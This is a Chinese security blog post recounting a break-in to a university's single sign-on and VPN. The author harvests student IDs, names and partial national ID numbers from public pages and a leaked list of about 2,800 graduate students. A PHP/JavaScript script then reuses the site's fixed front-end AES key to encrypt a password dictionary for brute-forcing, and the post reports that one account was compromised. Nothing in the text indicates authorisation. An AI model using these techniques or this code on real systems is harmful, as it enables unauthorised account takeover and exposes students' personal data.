漏洞挖掘 | 登录某大学VPN系统

HACK学习

修改于 2021-03-22 17:47:57

1.4K0

修改于 2021-03-22 17:47:57

文章被收录于专栏：HACK学习HACK学习

现在的大学日常都是sso统一身份认证，难搞哦

寻找废弃站点，作为突破口
信息搜集啊，信息搜集

信息搜集

加上了他们大学类似表白墙之类的小姐姐的QQ

一通乱翻好多学号+姓名，不再一一列出了

得到一个名字：赵天宇！霸气！就你了！

打开以看，各种信息免费赠送

共33页，一千二百多个身份证后四位

知道这是个研究生，进入研究生院

一通乱翻

找到这么个文件，下载下来后

2800多条研究生信息（后来一查，基本是全部的了）

登陆系统

通过信息搜集知道，sso需要学号和身份证后六位登录

通过刚才获取到的信息

我们已经知道了最起码1200条学号、姓名和身份证号后四位

他们学校基本都是展示页面，其他的都需要内网访问，但是还存在一个智慧校园

这里不存在验证码，可以爆破，但是对密码做了aes加密

不难看出加密在前端，直接定位关键js文件

可以看出加密的key都是固定得

偷个懒，把js下载下来

写程php代码，将生成的密码字典加密

encry_js.php

<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <script type="text/javascript" src="js/security.js"></script>
        <script type="text/javascript" src="js/login.js"></script>
        <script type="text/javascript">
            function file(pass){
                var pass = pass;
                var pwd = checkPassLogin(pass);
                // // document.write("<span>"+ pwd +"</span>");
                var xhr = null;
                if(window.XMLHttpRequest){
                    xhr = new XMLHttpRequest();
                }else{
                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
                }
 
                //准备发送
                xhr.open("post","http://127.0.0.1:92/js/encry.php",true);//这里的发送方式取决于后台，true待变异步发送
                xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded;charset=UTF-8");// 向请求添加 HTTP 头，POST如果有数据一定加加！！！！
                var value = "value="+pwd + "&pass=" + pass;//定义发送内容
                // console.log(value)
                xhr.send(value);
                xhr.onreadystatechange=function(){
                    if (xhr.readyState == 4 && xhr.status == 200){//说明请求完成/响应200，说明请求成功
                        var request = xhr.responseText;//获取响应的内容
                        // console.log(request);
                        // if (request == "ok"){
                        //     document.write("<span>"+ pwd +"</span>");
                        // }else{
                        // }
                        // document.write("<span>"+ request +"</span>\n");
                    }
                }
            }
        </script>
    </head>
    <body>
    <?php
        $file = fopen(".\\1134.txt", "r");
        //输出文本中所有的行，直到文件结束为止。
        while(! feof($file))
        {
            $password= trim(fgets($file));
            echo "<script>file('".$password."')</script>";
        }
        fclose($file);
    ?>
    </body>
<html>

encry.php

<?php
$value = $_POST['value'];
// $pass = $_POST['pass'];
// if($value == "2867a2bb26a41ddde23ad4747693123d20feae03a18c1ffd68be6105e0ec594eca82cc3160d46189335704c0389ee928669d89520ccc36d59ed408ad603d10a59f10e7c7afa8eb877d821e1521dc5f1152bf149cb407476a775fcbb057dc98d7312402a06b313341441d1d2c883e77d1a254d119c98aa7830a171df02ad4e37f"){
// file_put_contents("1.txt", $pass, FILE_APPEND);
// }
$value = $value."\n";
file_put_contents("test-1134.txt", $value, FILE_APPEND);

?>

最后在爆破的时候，第三章账号成功得到了账号/密码

上面注释就是密码的字符串，但是绕我修改密码才能进入，苟的很